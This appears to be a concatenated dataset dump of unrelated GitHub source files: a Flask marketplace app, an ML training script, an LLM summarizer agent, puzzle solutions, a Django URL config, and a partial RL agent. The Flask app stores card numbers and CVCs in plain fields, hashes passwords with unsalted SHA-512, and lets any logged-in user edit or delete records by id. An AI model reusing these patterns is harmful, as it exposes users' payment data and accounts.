titulo=\"Usuário\")\n\n@app.route(\"/usuario/criar\", methods=['POST'])\ndef criarusuario():\n hash = hashlib.sha512(str(request.form.get('passwd')).encode(\"utf-8\")).hexdigest()\n usuario = Usuario(request.form.get('user'), request.form.get('nome'), request.form.get('email'), hash, request.form.get('telefone'), request.form.get('rua'), request.form.get('numero'), request.form.get('bairro'), request.form.get('cidade'), request.form.get('estado'), request.form.get('cep'))\n db.session.add(usuario)\n db.session.commit() \n return redirect(url_for('usuario'))\n\n@app.route(\"/usuario/detalhar/\")\n@login_required\ndef buscarusuario(id):\n usuario = Usuario.query.get(id)\n return usuario.nome\n\n@app.route(\"/usuario/editar/\", methods=['GET','POST'])\n@login_required\ndef editarusuario(id):\n if request.method == 'POST':\n usuario.username = request.form.get('user')\n usuario.nome = request.form.get('nome')\n usuario.email = request.form.get('email')\n usuario.senha = hashlib.sha512(str(request.form.get('passwd')).encode(\"utf-8\")).hexdigest()\n usuario.rua = request.form.get('rua')\n usuario.numero = request.form.get('numero')\n usuario.bairro = request.form.get('bairro')\n usuario.cidade = request.form.get('cidade')\n usuario.estado = request.form.get('estado')\n usuario.cep = request.form.get('cep')\n db.session.add(usuario)\n db.session.commit()\n return redirect(url_for('usuario'))\n return render_template('eusuario.html', usuario = usuario, titulo=\"Usuario\")\n\n@app.route(\"/usuario/deletar/\")\n@login_required\ndef deletarusuario(id):\n usuario = Usuario.query.get(id)\n db.session.delete(usuario)\n db.session.commit()\n return redirect(url_for('usuario')) \n\n@app.route(\"/relatorios/vendas\")\n@login_required\ndef relvendas():\n usuario_id = current_user.id\n vendas = Compra.query.filter_by(vendedor_id=usuario_id).all()\n return render_template('relvendas.html', vendas=vendas, titulo=\"Relatório de Vendas\")\n\n@app.route(\"/relatorios/compras\")\n@login_required\ndef relcompras():\n usuario_id = current_user.id\n compras = Compra.query.filter_by(comprador_id=usuario_id).all()\n return render_template('relcompras.html', compras=compras, titulo=\"Relatório de Compras\")\n\n@app.route(\"/cartao\")\n@login_required\ndef cartao():\n usuario_id = current_user.id\n cartoes = Cartao.query.filter_by(usuario_id=usuario_id).all()\n return render_template('cartao.html', cartoes = cartoes, titulo=\"Cartão de Crédito\")\n\n@app.route(\"/cartao/criar\", methods=['POST'])\n@login_required\ndef novocartao():\n usuario_id = current_user.id\n cartao = Cartao(request.form.get('num_cartao'), request.form.get('nome_cartao'), request.form.get('month'), request.form.get('year'), request.form.get('cvc'), usuario_id=usuario_id)\n db.session.add(cartao)\n db.session.commit() \n return redirect(url_for('cartao'))\n\n@app.route(\"/cartao/detalhar/\")\n@login_required\ndef buscarcartao(id):\n cartao = Cartao.query.get(id)\n return cartao.num_cartao\n\n@app.route(\"/cartao/editar/\", methods=['GET','POST'])\n@login_required\ndef editarcartao(id):\n cartao = Cartao.query.get(id)\n if request.method == 'POST':\n usuario_id = current_user.id\n cartao.num_cartao = request.form.get('num_cartao')\n cartao.nome_cartao = request.form.get('nome_cartao')\n cartao.month = request.form.get('month')\n cartao.year = request.form.get('year')\n cartao.cvc = request.form.get('cvc')\n cartao.usuario_id = usuario_id\n db.session.add(cartao)\n db.session.commit()\n return redirect(url_for('cartao'))\n return render_template('ecartao.html', cartao = cartao, titulo=\"Cartao\")\n\n@app.route(\"/cartao/deletar/\")\n@login_required\ndef deletarcartao(id):\n cartao = Cartao.query.get(id)\n db.session.delete(cartao)\n db.session.commit()\n return redirect(url_for('cartao')) \n\n@app.route(\"/categoria\")\n@login_required\ndef categoria():\n return render_template('categoria.html', categorias = Categoria.query.all(), titulo='Categoria')\n\n@app.route(\"/categoria/criar\", methods=['POST'])\n@login_required\ndef criarcategoria():\n categoria = Categoria(request.form.get('nome'), request.form.get('desc'))\n db.session.add(categoria)\n db.session.commit()\n return redirect(url_for('categoria'))\n\n@app.route(\"/categoria/detalhar/\")\n@login_required\ndef buscarcategoria(id):\n categoria = Categoria.query.get(id)\n return categoria.nome\n\n@app.route(\"/categoria/editar/\", methods=['GET','POST'])\n@login_required\ndef editarcategoria(id):\n categoria = Categoria.query.get(id)\n if request.method == 'POST':\n categoria.nome = request.form.get('nome')\n categoria.desc = request.form.get('desc')\n db.session.add(categoria)\n db.session.commit()\n return redirect(url_for('categoria'))\n return render_template('ecategoria.html', categoria = categoria, titulo=\"Categoria\")\n\n@app.route(\"/categoria/deletar/\")\n@login_required\ndef deletarcategoria(id):\n categoria = Categoria.query.get(id)\n db.session.delete(categoria)\n db.session.commit()\n return redirect(url_for('categoria')) \n\n@app.route(\"/produtos\")\n@login_required\ndef produto():\n usu_id = current_user.id\n produtos = Produto.query.filter_by(usu_id=usu_id).all()\n return render_template('produtos.html', produtos = produtos, categorias = Categoria.query.all(), titulo=\"Produtos\")\n\n@app.route(\"/produtos/criar\", methods=['POST'])\n@login_required\ndef criarproduto():\n usuario_id = current_user.id\n produto = Produto(request.form.get('nome'), request.form.get('desc'), request.form.get('espec'), request.form.get('marca'), request.form.get('modelo'), request.form.get('qtd'),request.form.get('preco'),request.form.get('cat'),usu_id=usuario_id)\n db.session.add(produto)\n db.session.commit()\n return redirect(url_for('produto'))\n\n@app.route(\"/produtos/detalhar/\")\n@login_required\ndef buscarproduto(id):\n produto = Produto.query.get(id)\n return Produto.nome\n\n@app.route(\"/produtos/editar/\", methods=['GET','POST'])\n@login_required\ndef editarproduto(id):\n produto = Produto.query.get(id)\n if request.method == 'POST':\n usuario_id = current_user.id\n produto.prod_nome = request.form.get('nome')\n produto.prod_desc = request.form.get('desc')\n produto.prod_espec = request.form.get('espec')\n produto.prod_marca = request.form.get('marca')\n produto.prod_modelo = request.form.get('modelo')\n produto.prod_qtd = request.form.get('qtd')\n produto.prod_preco = request.form.get('preco')\n produto.cat_id = request.form.get('cat')\n produto.usu_id = usuario_id\n db.session.add(produto)\n db.session.commit()\n return redirect(url_for('produto'))\n return render_template('eprodutos.html', categorias = Categoria.query.all(), usuarios = Usuario.query.all(), produto = produto, titulo=\"Produto\")\n\n@app.route(\"/produtos/deletar/\")\n@login_required\ndef deletarproduto(id):\n produto = Produto.query.get(id)\n db.session.delete(produto)\n db.session.commit()\n return redirect(url_for('produto'))\n\n@app.route(\"/produtos/comprar\")\ndef produtos_anunciados():\n return render_template('produtos_anunciados.html', produtos = Produto.query.all(), categorias = Categoria.query.all(), usuarios = Usuario.query.all(), titulo=\"Produtos\")\n\n@app.route(\"/produtos/favoritos\")\n@login_required\ndef favoritos():\n usuario_id = current_user.id\n favoritos = Favorito.query.filter_by(usuario_id=usuario_id).all()\n return render_template('favoritos.html', favoritos=favoritos, titulo=\"Produtos Favoritados\")\n\n@app.route(\"/favoritar/\", methods=['POST'])\n@login_required\ndef favoritar(id):\n usuario_id = current_user.id\n favorito_existente = Favorito.query.filter_by(usuario_id=usuario_id, produto_id=id).first()\n if favorito_existente:\n print(\"Este produto já foi favoritado por você.\")\n else:\n favorito = Favorito(usuario_id=usuario_id, produto_id=id)\n db.session.add(favorito)\n db.session.commit()\n return redirect(url_for('produtos_anunciados'))\n\n@app.route(\"/remover_favorito/\", methods=['POST'])\n@login_required\ndef remover_favorito(id):\n usuario_id = current_user.id\n favorito = Favorito.query.filter_by(usuario_id=usuario_id, produto_id=id).first()\n if favorito:\n db.session.delete(favorito)\n db.session.commit()\n return redirect(url_for('favoritos'))\n\n@app.route(\"/escolher_compra/\", methods=['GET', 'POST'])\n@login_required\ndef escolher_compra(produto_id):\n produto = Produto.query.get(produto_id)\n if request.method == 'POST':\n quantidade = int(request.form.get('quantidade'))\n cartao_id = request.form.get('cartao_id')\n comprador_id = current_user.id\n vendedor_id = produto.usu_id\n compra = Compra(produto_id=produto_id, vendedor_id=vendedor_id, comprador_id=comprador_id, cartao_id=cartao_id, quantidade=quantidade)\n db.session.add(compra)\n db.session.commit()\n return redirect (url_for('produtos_anunciados'))\n return render_template('escolher_compra.html', produto=produto, cartoes=Cartao.query.filter_by(usuario_id=current_user.id).all())\n\n@app.route(\"/realizar_pergunta/\", methods=['GET', 'POST'])\ndef realizar_pergunta(produto_id):\n produto = Produto.query.get(produto_id)\n if request.method == 'POST':\n texto_pergunta = request.form.get('texto_pergunta')\n pergunta = Pergunta(produto_id=produto_id, texto=texto_pergunta)\n db.session.add(pergunta)\n db.session.commit()\n perguntas = Pergunta.query.filter_by(produto_id=produto_id).all()\n return render_template('perguntas.html', produto=produto, perguntas=perguntas, titulo=\"Realizar Pergunta\")\n\n@app.route(\"/responder_perguntas/\", methods=['GET', 'POST'])\n@login_required\ndef responder_perguntas(produto_id):\n produto = Produto.query.get(produto_id)\n perguntas = Pergunta.query.filter_by(produto_id=produto_id).all()\n if request.method == 'POST':\n pergunta_id = int(request.form.get('pergunta_id'))\n texto_resposta = request.form.get('texto_resposta')\n resposta = Resposta(pergunta_id=pergunta_id, texto=texto_resposta)\n db.session.add(resposta)\n db.session.commit()\n return render_template('respostas.html', produto=produto, perguntas=perguntas, titulo=\"Responder Perguntas\")\n\n@app.route(\"/sobre\")\ndef sobre():\n return render_template('sobre.html', titulo=\"Sobre Nós\")\n\n@app.route(\"/contato\")\ndef contato():\n return render_template('contato.html', titulo=\"Contato\")\n\nif __name__ == 'Offer':\n with app.app_context():\n db.create_all()\n","repo_name":"amshinohara/OfferUp","sub_path":"Offer.py","file_name":"Offer.py","file_ext":"py","file_size_in_byte":19287,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70962520749","text":"import os\nfrom utils import *\nimport numpy as np\nimport argparse\nfrom itertools import product\nfrom sklearn.metrics import roc_auc_score\nfrom torch.utils.data import DataLoader, Subset\n\ndef main(args):\n torch.manual_seed(0)\n np.random.seed(0)\n \n logfile = \"logs/runs.txt\"\n slurm_job_id = None\n if 'SLURM_JOBID' in os.environ:\n slurm_job_id = os.environ['SLURM_JOBID']\n logfile = f\"logs/slurm_{slurm_job_id}.txt\"\n print(\"Storing results in logfile\", logfile)\n\n if not os.path.exists(os.path.dirname(logfile)):\n os.mkdir(os.path.dirname(logfile))\n\n with open(logfile, \"a+\") as f:\n f.write('{}\\n'.format(args))\n data_dir = os.path.abspath(args.data_dir)\n for run in range(args.nruns):\n model, optimizer = load_model(args)\n\n train_data = load_process_data(args, data_dir, \"train\")\n test_data = load_process_data(args, data_dir, \"test\")\n print(len(train_data), len(test_data))\n\n train_dataloader = DataLoader(train_data, batch_size=args.batch_size, shuffle=True)\n test_dataloader = DataLoader(test_data, batch_size=args.batch_size, shuffle=False)\n\n for epoch in range(1, args.nepochs + 1):\n print()\n train(model, optimizer, train_dataloader, epoch, gradient_acc_steps=args.gradient_acc_steps)\n print('\\nRunning evaluation on test...')\n evaluate(model, test_dataloader, outfile=f\"logs/{slurm_job_id if slurm_job_id else ''}predictions.csv\")\n\n if args.save:\n save_path = \"cm_{}_{}_{}_{}.pkl\".format(args.model, args.learning_rate, args.batch_size, args.nepochs)\n print(\"SAVING to\", save_path)\n torch.save(model.module.state_dict(), save_path)\n return\n\ndef train(model, optimizer, train_dataloader, epoch, log_interval=10, gradient_acc_steps=1):\n # Set model to training mode\n model.train()\n\n criterion = torch.nn.BCEWithLogitsLoss()\n\n # Loop over each batch from the training set\n log_interval = max(int(len(train_dataloader) / 100), 1)\n print(f\"Training for {len(train_dataloader)} steps\", flush=True)\n if args.verbose:\n print(\"Logging every\", log_interval, \"steps\", flush=True)\n total_loss = 0\n total_items = 0\n correct = 0\n for step, batch in enumerate(train_dataloader):\n\n # Copy data to GPU if needed\n batch = tuple(t.cuda() for t in batch)\n\n # Unpack the inputs from our dataloader\n b_input_ids, b_input_mask, b_labels = batch\n\n # Forward pass\n output = model(b_input_ids, attention_mask=b_input_mask)[0].squeeze(-1)\n loss = criterion(output, b_labels.float()) / gradient_acc_steps\n\n # Backward pass\n loss.backward()\n \n total_loss += loss.item()*b_input_ids.size(0)\n total_items += b_input_ids.size(0)\n\n # For logging\n output = output.detach().cpu().numpy()\n predictions = (output > 0).astype(int)\n b_labels = b_labels.detach().cpu().numpy()\n correct += (predictions == b_labels).sum()\n\n if (step % gradient_acc_steps == 0) or (step + 1 == len(train_dataloader)):\n # Update weights\n optimizer.step()\n\n # Zero gradient buffers\n optimizer.zero_grad()\n\n if step % log_interval == 0 and args.verbose:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tRunning Loss: {:.6f}'.format(\n epoch, step * len(b_input_ids),\n len(train_dataloader.dataset),\n 100. * step / len(train_dataloader), total_loss / total_items), flush=True)\n \n acc = correct / total_items\n print(f\"Train Epoch: {epoch} \\tAvg Loss: {total_loss / total_items} \\tAcc: {acc}\")\n\n\ndef evaluate(model, dataloader, outfile=None):\n model.eval()\n correct = 0\n total = 0\n\n all_logits = []\n for batch in dataloader:\n batch = tuple(t.cuda() for t in batch)\n b_input_ids, b_input_mask, b_labels = batch\n\n with torch.no_grad():\n logits = model(b_input_ids, attention_mask=b_input_mask)[0]\n output = logits.squeeze(-1).detach().cpu().numpy()\n predictions = (output > 0).astype(int)\n\n b_labels = b_labels.detach().cpu().numpy()\n \n all_logits += list(output)\n\n for pred, label in zip(predictions, b_labels):\n if label == 0.5: # Don't evaluate ambiguous\n continue\n if pred == label:\n correct += 1\n total += 1\n \n scores = torch.sigmoid(torch.tensor(all_logits)) # Convert output logits to 0-1 scores\n out_class = scores > 0.5 # Binary classification\n out_uncertainty = np.minimum(scores, 1 - scores) # Uncertainty score is just how close we are to 0.5\n\n # Write out predictions\n if outfile:\n pd.DataFrame({\n 'class': out_class,\n 'uncertainty': out_uncertainty,\n }).to_csv(outfile, index=False)\n print(f\"Saved predictions to {outfile}\")\n\n if total > 0:\n acc = correct / total\n print(f'Accuracy: {acc:.4f} (on {total} non-ambig examples)')\n return acc\n return None\n\ndef get_probs(model, dataloader, no_labels=False):\n model.eval()\n\n all_probs = []\n for batch in dataloader:\n batch = tuple(t.cuda() for t in batch)\n if not no_labels:\n b_input_ids, b_input_mask, b_labels = batch\n else:\n b_input_ids, b_input_mask = batch # no labels\n\n with torch.no_grad():\n logits = model(b_input_ids, attention_mask=b_input_mask)[0]\n\n probs = torch.sigmoid(logits).squeeze(-1).detach().cpu().numpy()\n all_probs.append(probs)\n\n probs = np.concatenate(all_probs)\n return probs\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", \"-m\", type=str, default=\"bert-base-uncased\")\n parser.add_argument(\"--ngpus\", \"-n\", type=int, default=2)\n parser.add_argument(\"--nepochs\", \"-e\", type=int, default=2)\n parser.add_argument(\"--batch_size\", \"-b\", type=int, default=16)\n parser.add_argument(\"--gradient_acc_steps\", \"-a\", type=int, default=1)\n parser.add_argument(\"--max_length\", \"-t\", type=int, default=512)\n parser.add_argument(\"--weight_decay\", \"-w\", type=float, default=0.01)\n parser.add_argument(\"--learning_rate\", \"-l\", type=float, default=2e-5)\n parser.add_argument(\"--verbose\", \"-v\", action=\"store_true\")\n parser.add_argument(\"--nruns\", \"-r\", type=int, default=1)\n parser.add_argument(\"--save\", \"-s\", action=\"store_true\")\n parser.add_argument(\"--data_dir\", \"-d\", type=str, default=\"./dataset\")\n args = parser.parse_args()\n\n main(args)\n\n","repo_name":"JunShern/moral-uncertainty","sub_path":"baselines/tune.py","file_name":"tune.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"10381178941","text":"import re\nfrom agents.IAgent import AgentData\nfrom agents.ITask import Task\nimport spacy\nfrom spacy.lang.en.stop_words import STOP_WORDS\nfrom string import punctuation\nfrom heapq import nlargest\n\n\nclass ResultSummarizerAgent:\n def __init__(self):\n self.nlp = spacy.load('en_core_web_sm')\n pass\n\n def summarize_text(self, text, num_sentences=10, chunk_size=1000000):\n summaries = []\n for i in range(0, len(text), chunk_size):\n chunk = text[i:i+chunk_size]\n doc = self.nlp(chunk)\n stopwords = list(STOP_WORDS)\n word_frequencies = {}\n for word in doc:\n if word.text.lower() not in stopwords:\n if word.text.lower() not in punctuation:\n if word.text not in word_frequencies.keys():\n word_frequencies[word.text] = 1\n else:\n word_frequencies[word.text] += 1\n\n max_frequency = max(word_frequencies.values())\n for word in word_frequencies.keys():\n word_frequencies[word] = (word_frequencies[word]/max_frequency)\n\n sentence_tokens = [sent for sent in doc.sents]\n sentence_scores = {}\n for sent in sentence_tokens:\n for word in sent:\n if word.text.lower() in word_frequencies.keys():\n if sent not in sentence_scores.keys():\n sentence_scores[sent] = word_frequencies[word.text.lower()]\n else:\n sentence_scores[sent] += word_frequencies[word.text.lower()]\n\n summary_sentences = nlargest(num_sentences, sentence_scores, key=sentence_scores.get)\n final_sentences = [w.text for w in summary_sentences]\n summary = ' '.join(final_sentences)\n \n # Limit summary to a maximum of 4000 characters\n if len(summary) > 6000:\n summary = summary[:6000] + '...'\n \n summaries.append(summary)\n \n return ' '.join(summaries)\n \n def summarize(self, task: Task, agent: AgentData):\n result = self.summarize_text(task.result, 10)\n\n prompt = f\"\"\"Please rewrite this base text: {result} so that it is cleaner and easier to understand.\n Include relevant information, interesting URL (https:... etc) and examples that support the following task at hand: {task.description}.\n Provide extensive information, and feel free to include as many particulars as possible.\n\n Note: judge the relevance of the BASE TEXT (return \"Grade: ?/10\", 0 would be an error in the data), please be strict while assessing the quality of the base text in relation to the task.\n \"\"\"\n\n response = agent.open_ai.generate_text(prompt, 0.1)\n\n agent.logger.log(f\"Task Summary: {response}\")\n return response","repo_name":"mtrsklnkvMM/babygpt","sub_path":"agents/result_summarizer_agent.py","file_name":"result_summarizer_agent.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31107413841","text":"import re\n\ndata = list(open(\"2015-9-data\").readlines())\n\nlineParser = re.compile(r\"(\\w+) to (\\w+) = ([0-9]+)\")\n\npaths = dict()\ndists = dict()\n\ntests = [\n \"London to Dublin = 464\",\n \"London to Belfast = 518\",\n \"Dublin to Belfast = 141\"\n]\n\nfor line in data:\n matches = lineParser.findall(line)[0]\n cityFrom = matches[0]\n cityTo = matches[1]\n distance = int(matches[2])\n\n if cityFrom not in dists.keys():\n dists[cityFrom] = dict()\n if cityTo not in dists.keys():\n dists[cityTo] = dict()\n\n dists[cityFrom][cityTo] = distance\n dists[cityTo][cityFrom] = distance\n\n paths[(cityFrom, cityTo)] = distance\n paths[(cityTo, cityFrom)] = distance\n\n\n\ndef fournish(paths):\n newPaths = paths.copy()\n for path in paths.keys():\n reference = path[len(path) - 1]\n for nextStep in dists[reference]:\n if nextStep in path:\n continue\n newPaths[path + (nextStep,)] = paths[path] + dists[reference][nextStep]\n newPaths[(nextStep,) + path[::-1]] = paths[path] + dists[reference][nextStep]\n return newPaths\n\nprev = dict()\nwhile prev != paths:\n prev = paths\n paths = fournish(paths)\n\nprint(min([paths[key] for key in paths.keys() if len(key) == len(dists.keys())]))\nprint(max([paths[key] for key in paths.keys() if len(key) == len(dists.keys())]))\n","repo_name":"alexandreLBarrett/AoC","sub_path":"2015/2015-9.py","file_name":"2015-9.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24339042805","text":"# 李禄波\n# 2021/2/4 下午4:34\n\nimport time\nimport multiprocessing\nimport os\n\n\ndef dance():\n # 获取子进程id\n print(\"子进程 my_dance id:\", os.getpid())\n # 获取父进程id\n print(\"dance父进程:\", os.getppid())\n # 获取进程名\n print(\"dance的进程名是:\", multiprocessing.current_process())\n for i in range(5):\n\n time.sleep(1)\n print(\"dance\", i)\n\n\ndef sing():\n # 获取子进程id\n print(\"子进程 my_sing id:\", os.getpid())\n # 获取父进程id\n print(\"sing父进程:\", os.getppid())\n # 获取进程名\n print(\"sing的进程名是:\", multiprocessing.current_process())\n for i in range(5):\n\n time.sleep(1)\n print(\"sing\", i)\n\n\nif __name__ == \"__main__\":\n # 单进程 需要十秒钟完成\n # 最少有一个进程 该进程中最少有一个线程\n # dance()\n # sing()\n\n # 获取主进程id\n print(\"主进程id:\", os.getpid())\n\n # 多进程 需要五秒完成\n # 三个进程: 1个主进程 两个子进程\n # 三个线程: 三个线程 一个进程里有一个线程\n # 创建子进程\n # Process:\n # target:指定执行的任务名(函数名)\n # name:子进程的名字\n my_dance = multiprocessing.Process(target=dance, name=\"dance\")\n my_sing = multiprocessing.Process(target=sing)\n\n # 开启子进程(不开启子进程不会执行)\n my_dance.start()\n my_sing.start()\n","repo_name":"coderlubo/Web_base","sub_path":"01_多任务编程/01_多进程(重点).py","file_name":"01_多进程(重点).py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1066862893","text":"lis=list()\nc=0\nlis.append(str(input('digite um número')))\nres=str(input('Quer continuar: S/N')).upper()\nc=c+1\nwhile res=='S':\n lis.append(str(input('digite um número')))\n res = str(input('Quer continuar: S/N')).upper()\n c=c+1\n if res =='N':\n break\nlis.sort(reverse=True)\nprint (f'A quantidade de números digitados foi {c}')\nprint (f'A lista digitada de forma decrescente é {lis}')\nif '5' in lis:\n print ('o numero 5 está na lista')\nelse:\n print ('O numero 5 não está na lista')\n\n","repo_name":"abinoamenezes/CursoEmVideo","sub_path":"ex31.py","file_name":"ex31.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20478777137","text":"\nfrom queue import PriorityQueue\nv = 20\ngraph = [[] for i in range(v)]\n \n# Función para implementar la mejor primera búsqueda\n# Da una ruta de salida con el costo más bajo\n \n \ndef best_first_search(source, target, n):\n visited = [0] * n\n visited[0] = True\n pq = PriorityQueue()\n pq.put((0, source))\n while pq.empty() == False:\n u = pq.get()[1]\n # Displaying the path having lowest cost\n print(u, end=\" \")\n if u == target:\n break\n \n for v, c in graph[u]:\n if visited[v] == False:\n visited[v] = True\n pq.put((c, v))\n print()\n \n# Función para agregar bordes al gráfico\n \n \ndef addedge(x, y, cost):\n graph[x].append((y, cost))\n graph[y].append((x, cost))\n \n \n\n# implementado usando enteros agregados (x, y, costo);\naddedge(0, 1, 3)\naddedge(0, 2, 6)\naddedge(0, 3, 5)\naddedge(1, 4, 9)\naddedge(1, 5, 8)\naddedge(2, 6, 12)\naddedge(2, 7, 14)\naddedge(3, 8, 7)\naddedge(8, 9, 5)\naddedge(8, 10, 6)\naddedge(9, 11, 1)\naddedge(9, 12, 10)\naddedge(9, 13, 2)\naddedge(10, 14, 1)\naddedge(10, 15, 12)\naddedge(16, 17, 18)\n\n#En source se pone el numero en donde quiere iniciar, y en target en donde quiere finalizar\n#(Si no hay ruta que lo lleve al resultado final, termina en el ultimo)\nsource = 0\ntarget = 14\nbest_first_search(source, target, v)\n \n# El codigo original está hecho por Jyotheeswar Ganne y lo modificamos\n","repo_name":"zMaylox/Practicas-oficiales","sub_path":"3.7 best-first search.py","file_name":"3.7 best-first search.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6599937502","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls import handler404, handler500, handler400\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n path('', include('app.urls')),\n path('accounts/', include('accounts.urls')),\n path('finance/', include('finance.urls')),\n path('library/', include('library.urls')),\n path('programs/', include('course.urls')),\n path('result/', include('result.urls')),\n path('search/', include('search.urls')),\n path('quiz/', include('quiz.urls')),\n path('cal/', include('cal.urls')),\n path('fold/', include('folder.urls', namespace='main')),\n path('folder/', include('folder.urls', namespace='folder')),\n path('file/', include('file.urls', namespace='file')),\n # path('payments/', include('payments.urls')),\n # path('calendar/', include('cal.urls')),\n path('accounts/api/', include('accounts.api.urls', namespace='accounts-api')),\n path('bulksms/', include('bulksms.urls')),\n path('admin/', admin.site.urls),\n]\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n# handler404 = 'app.views.handler404'\n# handler500 = 'app.views.handler500'\n# handler400 = 'app.views.handler400'\n\n\n\n","repo_name":"roberwangunda/django-lms","sub_path":"SMS/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379826667","text":"import dataclasses\nfrom typing import Any, Callable, Dict, List, Optional, Sequence, Tuple\n\nimport haiku as hk\nimport jax\nimport jax.numpy as jnp\nimport numpy as np\nimport optax\n\nfrom open_spiel.python import rl_agent\nfrom open_spiel.python import rl_agent_policy\nfrom open_spiel.python import rl_environment\nfrom open_spiel.python.mfg.algorithms import distribution\nimport pyspiel\nfrom open_spiel.python.utils import reservoir_buffer\nfrom open_spiel.python.utils import training\n\n\n@dataclasses.dataclass\nclass Transition:\n \"\"\"Transitions stored in the reservoir buffer.\"\"\"\n info_state: np.ndarray\n action_probs: np.ndarray\n legal_actions_mask: np.ndarray\n\n\nclass AveragePolicy(rl_agent.AbstractAgent):\n \"\"\"NFSP-like agent that learns an average policy using a single network.\"\"\"\n\n def __init__(self,\n player_id: int,\n br_rl_agent: rl_agent.AbstractAgent,\n state_representation_size: int,\n num_actions: int,\n hidden_layers_sizes: List[int],\n params_avg_network: Optional[jnp.ndarray] = None,\n reservoir_buffer_capacity: int = 100000,\n batch_size: int = 128,\n learning_rate: float = 0.01,\n min_buffer_size_to_learn: int = 1000,\n optimizer_str: str = 'sgd',\n gradient_clipping: Optional[float] = None,\n seed: int = 42,\n tau: float = 1.0):\n \"\"\"Initialize the AveragePolicy agent.\"\"\"\n self._br_rl_agent = br_rl_agent\n self._player_id = player_id\n self._num_actions = num_actions\n self._batch_size = batch_size\n self._min_buffer_size_to_learn = min_buffer_size_to_learn\n\n self._reservoir_buffer = reservoir_buffer.ReservoirBuffer(\n reservoir_buffer_capacity)\n\n # Keep track of the last training loss achieved in an update step.\n self._last_loss_value = None\n\n # Average policy network.\n def network(x):\n mlp = hk.nets.MLP(hidden_layers_sizes + [num_actions])\n return mlp(x)\n\n self.avg_network = hk.without_apply_rng(hk.transform(network))\n\n def avg_network_policy(param, info_state):\n action_values = self.avg_network.apply(param, info_state)\n return jax.nn.softmax(action_values / tau, axis=1)\n\n self._avg_network_policy = jax.jit(avg_network_policy)\n\n rng = jax.random.PRNGKey(seed)\n x = jnp.ones([1, state_representation_size])\n # Use the specified parameters if any, or initialize the network with random\n # weights.\n if params_avg_network is None:\n self._params_avg_network = self.avg_network.init(rng, x)\n else:\n self._params_avg_network = jax.tree_map(lambda x: x.copy(),\n params_avg_network)\n self._params_avg_network = jax.device_put(self._params_avg_network)\n\n if optimizer_str == 'adam':\n optimizer = optax.adam(learning_rate)\n elif optimizer_str == 'sgd':\n optimizer = optax.sgd(learning_rate)\n else:\n raise ValueError('Not implemented, choose from \"adam\" and \"sgd\".')\n\n if gradient_clipping:\n optimizer = optax.chain(optimizer,\n optax.clip_by_global_norm(gradient_clipping))\n\n opt_init, opt_update = optimizer.init, optimizer.update\n\n def opt_update_fn(params, opt_state, gradient):\n \"\"\"Learning rule (stochastic gradient descent).\"\"\"\n updates, opt_state = opt_update(gradient, opt_state)\n new_params = optax.apply_updates(params, updates)\n return new_params, opt_state\n\n self._opt_update_fn = opt_update_fn\n self._opt_state = opt_init(self._params_avg_network)\n self._loss_and_grad = jax.value_and_grad(self._loss_avg, has_aux=False)\n\n self._jit_update = jax.jit(self._get_update_fn())\n\n def _get_update_fn(self):\n \"\"\"Returns the function that updates the parameters.\"\"\"\n\n def update(param_avg, opt_state_avg, info_states, action_probs):\n loss_val, grad_val = self._loss_and_grad(param_avg, info_states,\n action_probs)\n new_param_avg, new_opt_state_avg = self._opt_update_fn(\n param_avg, opt_state_avg, grad_val)\n return new_param_avg, new_opt_state_avg, loss_val\n\n return update\n\n def _act(self, info_state, legal_actions) -> Tuple[int, np.ndarray]:\n \"\"\"Returns an action and the action probabilities.\"\"\"\n info_state = np.reshape(info_state, [1, -1])\n action_probs = self._avg_network_policy(self._params_avg_network,\n info_state)\n # Remove illegal actions and normalize probs\n probs = np.zeros(self._num_actions)\n action_probs = np.asarray(action_probs)\n probs[legal_actions] = action_probs[0][legal_actions]\n probs /= sum(probs)\n action = np.random.choice(len(probs), p=probs)\n return action, probs\n\n @property\n def loss(self) -> Optional[float]:\n \"\"\"Return the latest loss.\"\"\"\n return self._last_loss_value\n\n def step(self,\n time_step: rl_environment.TimeStep,\n is_evaluation: bool = True) -> Optional[rl_agent.StepOutput]:\n \"\"\"Returns the action to be taken by following the average network policy.\n\n Note that unlike most other algorithms, this method doesn't train the agent.\n Instead, we add new samples to the reservoir buffer and the training happens\n at a later stage.\n\n Args:\n time_step: an instance of rl_environment.TimeStep.\n is_evaluation: bool, whether this is a training or evaluation call.\n\n Returns:\n A `rl_agent.StepOutput` containing the action probs and chosen action.\n \"\"\"\n\n # Prepare for the next episode.\n if time_step.last():\n return\n\n if is_evaluation:\n # Use the average policy network.\n info_state = time_step.observations['info_state'][self._player_id]\n legal_actions = time_step.observations['legal_actions'][self._player_id]\n action, probs = self._act(info_state, legal_actions)\n return rl_agent.StepOutput(action=action, probs=probs)\n\n # Use the best response agent and add the transition in the reservoir\n # buffer.\n br_agent_output = self._br_rl_agent.step(time_step, is_evaluation=True)\n self._add_transition(time_step, br_agent_output)\n return br_agent_output\n\n def _add_transition(self, time_step, agent_output):\n \"\"\"Adds the new transition using `time_step` to 